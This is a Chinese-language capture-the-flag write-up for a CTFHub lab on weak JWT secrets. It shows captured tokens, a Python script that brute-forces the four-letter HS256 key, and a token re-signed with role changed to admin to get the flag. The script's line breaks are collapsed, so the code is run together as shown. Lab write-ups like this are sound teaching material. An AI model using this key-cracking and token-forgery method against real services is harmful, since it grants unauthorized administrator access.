ctfhub 技能树 JSON Web Token 弱秘钥

技能树 JSON Web Token 弱秘钥"/>

ctfhub 技能树 JSON Web Token 弱秘钥

1、题目提示：如果JWT采用对称加密算法，并且密钥的强度较弱的话，攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag

2、burpsuit抓包

3、获取token进行暴力破解

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic
​
base64解码
{"typ":"JWT","alg":"HS256"}{"username":"admin","password":"password","role":"guest"}Ġ$s༛•bϼǮx抚0•媋:
​
python3 暴力破解
hqpf {'username': 'admin', 'password': 'password', 'role': 'guest'}
秘钥为“hqpf”

4、修改role为admin，将数据修改为

{'username': 'admin', 'password': 'password', 'role': 'guest'}
修改为
{'username': 'admin', 'password': 'password', 'role': 'admin'}
​

5、使用破解的秘钥“hqpf”，进行HS256加密

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJhZG1pbiJ9.llAK3IYwPg5I3amQVElpIZo7kwfTnh_Y5KohY5qzFt8

6、burp修改index.php的token获取flag

7、python脚本

pip install pyjwt

#!C:\Python3.7
# -*- coding:utf-8 -*-
import jwt
import string
import itertoolsdef test_HS256():key = "test"encoded = jwt.encode({"some":"payload"},key,algorithm="HS256")print(encoded)try:# print(jwt.decode(encoded,"test",algorithms="HS256"))print(jwt.decode(encoded, "tes", algorithms="HS256"))except Exception as e:print(e)print("error")exit()def brute_HS256(encode):keys=string.ascii_lowercase# print(keys)for i in itertools.product(keys,repeat=4):key = "".join(i)print("[--]test ",key)try:print("[****]key:",key,jwt.decode(encode,key,algorithms="HS256"))breakexcept Exception as e:pass# print(key)if __name__ == '__main__':# test_HS256()encode="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic"brute_HS256(encode)# print(jwt.encode({'username': 'admin', 'password': 'password', 'role': 'admin'},"hqpf",algorithm="HS256"))

jwt 库简单使用

PyJWT 使用 .html